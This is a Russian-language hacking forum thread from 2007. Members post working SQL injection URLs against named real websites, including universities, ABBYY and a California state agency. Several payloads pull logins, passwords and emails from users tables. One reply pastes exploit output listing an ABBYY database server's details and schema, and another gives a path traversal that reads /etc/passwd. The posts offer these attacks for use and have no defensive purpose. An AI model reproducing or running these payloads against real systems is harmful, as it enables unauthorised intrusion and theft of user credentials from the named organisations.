Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
01.09.2007, 19:36
|
|
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
Провел на форуме:
4172659
Репутация:
646
|
|
Сайт: d v g a m e s . r u
Уязвимость: уязвим параметр dvglasid (Cookies)
dvglasid=-1+union+select+1,2,concat(login,0x3a,password,0x3a ,email)+from+users
Enjoy  |
|
|
01.09.2007, 19:45
|
|
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642
Репутация:
569
|
|
.edu код: http://www.brockport.edu/athletics/news.php?id=-495'+union+select+1,2,3,version(),5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19/* не смог подобрать ни одну таблицу  |
|
|
|
01.09.2007, 20:50
|
|
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642
Репутация:
569
|
|
.edu код: http://www.music.uiuc.edu/facultyBio.php?id=-61+union+select+1,2,table_name,4+from+information_ schema.tables/*
|
|
|
|
01.09.2007, 20:56
|
|
Участник форума
Регистрация: 19.05.2007
Сообщений: 228
Провел на форуме:
4325663
Репутация:
240
|
|
lib.web-malina.com
"Самые интересные книги".
Код:
http://lib.web-malina.com/getbook.php?bid=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9/*
Код:
http://lib.web-malina.com/getbook.php?bid=-1+union+select+1,2,3,4,5,6,7,8,9+from+users/*
таблица users.
Код:
http://lib.web-malina.com/getbook.php?bid=-1+union+select+1,2,count(*),4,5,6,7,8,9+from+users/*
646 пользователей.
Код:
http://lib.web-malina.com/getbook.php?bid=-1+union+select+1,concat_ws(0x3a,name,pass,email),3,4,5,6,7,8,9+from+users+limit+150,1/*
Колонки name, pass, email.
|
|
|
|
01.09.2007, 23:05
|
|
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642
Репутация:
569
|
|
.edu последний на сегодня 
код:http://www.ittc.ku.edu/view_project.phtml?id=-242+union+select+1,2,3,concat(version(),user(),dat abase()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22/*
таблы не подбирал |
|
|
|
02.09.2007, 01:18
|
|
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120
Репутация:
2565
|
|
ABBYY
Код:
http://www.abbyy.ru/press/press_releases.asp?param=-1+or+1=(select+db_name())--
http://www.abbyy.ru/sdk/?param=-1+or+1=(select+system_user)--
http://www.abbyy.com/press/press_releases.asp?param=136693+or+1=@@version--
Есть таблица user
|
|
|
|
02.09.2007, 23:41
|
|
Познающий
Регистрация: 17.10.2006
Сообщений: 83
Провел на форуме:
552846
Репутация:
55
|
|
Сообщение от [53x]Shadow
ABBYY
Код:
http://www.abbyy.ru/press/press_releases.asp?param=-1+or+1=(select+db_name())--
http://www.abbyy.ru/sdk/?param=-1+or+1=(select+system_user)--
http://www.abbyy.com/press/press_releases.asp?param=136693+or+1=@@version--
Есть таблица user
продолжение
Код:
SQL Injection Private Exploit
System user: publishing
Database name: Publishing
Server name: SQL2
IS Sysadmin ? : 0
User databases number: 43
User tables count in curent DB: 461
Permission to create tables: Yes
SQL Server version: 2000
Windows version: 2003
referendum
participantsInfo
FineReaderSprintForm
current_situation
lingvo_interface_voting
Anketa_sdk
Seminar2005
Anketa_PDFTransformer_rus
lingvoMabileDevisesTesting
FineReaderForm
voting_lingvo_cards
Anketa_FineReaderHomeEdition
goroda_users_words
voting_lingvo_sound
voting_abbyy_ru
dtproperties
FR67_Trial_User_Survey_USA
DealersForm
voting_lingvo_search
Anketa_FineReaderHomeEdition_2
FR8_User_Survey_USA
voting_abbyy_com
DB_Export
FR8_Trial_User_Survey_USA
syssegments
questions_list
Digital_Camera_OCR
Anketa_FineReaderSprint
lingvo_valentine
voting_lingvo_default_page
Anketa_AbbyyRuHelpPoll
FinereaderPRO8_Requests
lingvoMobileDevicesTesting
Anketa_PDFTransformer_1
Anketa_PDFTransformer_2
subscribes_partner_portal
promo_beaver_action
sysconstraints
Anketa_STO_1
USA_PartnersRegistration
voting_metro_lingvo_adv
Lingvo_forum_1_3
Lingvo_forum_next
certification
msdb
abbyyru_FRCE90
LingvoBannersTracking
ReportServer
Dialog_Forum_new
voting
Lingvo_RegistrationNY
tempdb
Lingvo_Forum_new
docflow_referendum
Docflow_Forum
LingvoDA_Forum
covercd
AdventureWorks2000
abbyycom_PDFTransformer
FormReader_Forms
LingvoDa_Forum_new
IPDatabase
WebStats
dialog21_referendum
ReportServerTempDB
FineReader_forum_R
master
Lingvo_Forum
tsla
review
docflow
subscribe
lingvoDa_Dictionaries
QuotGame
LPDatabase
model
Dialog_Forum
KnowledgeBase
SuccessStories_test
Docflow_Forum_new
Publishing
TrialForms
pubs
SuccessStories
ForumDialog_1_3
SuccessStories2
LingvoDA_referendum
docflow_registration
результат
xena military private sql injection exploit v2.0
Последний раз редактировалось _Great_; 04.09.2007 в 15:20..
Причина: километровым шрифтом писать не пробовал?
|
|
|
|
02.09.2007, 18:13
|
|
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
Провел на форуме:
1541753
Репутация:
552
|
|
Код:
http://www.arb.ca.gov/lispub/rss/displaypost.php?pno=-573+union+select+1,2,3,table_name,5+from+INFORMATION_SCHEMA.TABLES+limit+23,1/*
|
|
|
|
02.09.2007, 21:20
|
|
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642
Репутация:
569
|
|
edu
не смог вывести пароли логины,кроме фамилий,имен и т.д
код
: http://fs.cs.fhm.edu/mitglieder.phtml?id=-48+union+select+1,concat(column_name,char(58),tabl e_name),3,4,5,6,7,8,9,10,11,12,13,14+from+informat ion_schema.columns+limit+650,1/*
Последний раз редактировалось fobofob; 02.09.2007 в 21:23..
|
|
|
|
03.09.2007, 03:27
|
|
Познающий
Регистрация: 08.06.2007
Сообщений: 75
Провел на форуме:
517024
Репутация:
76
|
|
uni.de инжектится во все дыры, плюс читалка http://www.uni.de/?goto=../../../../../../../../etc/passwd%00
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [53x]Shadow](/avatars/avatar32248.gif){kind=avatar}
Похожие темы
Комбинированный вид